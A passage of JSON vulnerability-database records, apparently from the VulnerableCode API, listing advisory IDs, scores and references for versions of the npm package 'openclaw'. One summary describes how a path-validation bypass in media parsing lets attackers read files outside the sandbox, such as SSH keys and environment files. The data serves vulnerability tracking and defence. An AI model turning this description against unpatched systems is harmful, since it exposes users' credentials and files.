fft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6w
th-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bn
fh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd
4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kp3a-gr66-zkam"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-m46m-y19r-2kd2"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8
xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-qyyn-bw9t-r7c4"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-tu4b-f885-eyds"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9
cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-yk
wt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.2"}],"aliases":["CVE-2026-22180","GHSA-3pxq-f3cp-jmxp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8u6d-ekbs-afgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91812?format=json","vulnerability_id":"VCID-8uzb-xmf8-hbca","summary":"OpenClaw is vulnerable to Path Traversal through path validation bypass\nOpenClaw through 2026.3.23 (fixed in commit 4797bbc) contains a path traversal vulnerability in media parsing that allows attackers to read arbitrary files by bypassing path validation in the isLikelyLocalPath() and isValidMedia() functions. 
Attackers can exploit incomplete validation and the allowBareFilename bypass to reference files outside the intended application sandbox, resulting in disclosure of sensitive information including system files, environment files, and SSH keys.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32846","reference_id":"","reference_type":"","scores":[{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08194","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08191","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00027","scoring_system":"epss","scoring_elements":"0.08208","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32846"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4797bbc5b96e2cca5532e43b58915c051746fe37"},{"reference_url":"https://github.com/openclaw/openclaw/pull/54642","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_e
lements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"}],"url":"https://github.com/openclaw/openclaw/pull/54642"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6pf-4gjx-c94r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32846","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32846"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-media-parsing-path-traversal-to-arbitrary-file-read","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-27T14:43:02Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-media-parsing-path-traversal-to-arbitrary-file-read"},{"reference_url":"https://github.com/advisories/GHSA-hggm-x7r9-mm7v","reference_id":"GHSA-hggm-x7r9-mm7v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hggm-x7r9-mm7v"}],"fixed_packages":[{"ur
l":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"
vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"
vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"
